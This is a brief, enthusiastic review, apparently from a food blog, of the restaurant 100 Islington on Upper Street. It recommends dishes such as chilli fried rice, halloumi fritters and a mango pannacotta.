big fans of 100 Hoxton so we were pretty damn excited to hear they were opening 100 Islington on Upper Street and wasted no time in getting down there to check it out.

If you’ve been to 100 Hoxton, much of the menu will be familiar which is no bad thing at all when you’re talking about awesome dishes such as the chilli fried rice with Chinese sausage and fried egg – we could eat bowls and bowls of the stuff quite happily. The menu is very loosely ‘Asian’ influenced but its a real mix of everything really. One of our favourites was courgette and halloumi fritters with thick preserved lemon yoghurt, which made us think more of holidays in Greece.

It’s one of those menus where its so hard choosing what to get but some more top picks from us are the okra dahl with caramelised onion and spinach paneer; pork belly with papaya salad; rainbow trout with pineapple and samphire; and crushes new potatoes, parsnips and carrot.

There’s decent cocktails, wine and beer too but make sure you save room for dessert after all that lot – we loved the mango, lemongrass and lime pannacota.
